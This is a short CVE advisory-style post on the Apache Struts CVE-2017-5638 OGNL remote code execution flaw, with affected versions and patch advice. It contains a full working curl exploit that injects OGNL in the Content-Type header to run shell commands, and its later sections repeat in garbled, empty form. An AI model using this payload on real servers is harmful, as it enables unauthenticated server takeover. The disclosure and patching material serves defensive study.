Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

How the mentioned CVE works:

The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts. The flaw is triggered when a malicious Content-Type header is sent in an HTTP request to a Struts-based application. The parser incorrectly handles the exception thrown during file upload validation, specifically when an invalid `Content-Type` value is provided. An attacker can embed an Object-Graph Navigation Language (OGNL) expression within the Content-Type header. Due to the flawed exception handling, this OGNL expression is evaluated by the server. Since OGNL expressions can execute arbitrary system commands on the server, this allows an unauthenticated attacker to achieve full Remote Code Execution with the same privileges as the Struts application server, simply by crafting a malicious HTTP request.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-endpoint`

How Exploit:

Craft malicious HTTP request with OGNL expression in Content-Type header. Exploit publicly available. Unauthenticated Remote Code Execution.

Protection from this CVE:

Apply official patch. Upgrade to Struts 2.3.32 or 2.5.10.1. Implement WAF rules to filter malicious Content-Type headers.

Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

How the mentioned CVE works:

Vulnerability : Remote Code Execution

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

How Exploit:

Protection from this CVE:

Impact:

Complete system compromise. Unauthorized data access. Server takeover.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

📢 Follow DailyCVE & Stay Tuned:

Listen to this Post

How the mentioned CVE works:

Vulnerability : Remote Code Execution

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

How Exploit:

Protection from this CVE:

Impact:

Complete system compromise. Unauthorized data access. Server takeover.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

📢 Follow DailyCVE & Stay Tuned: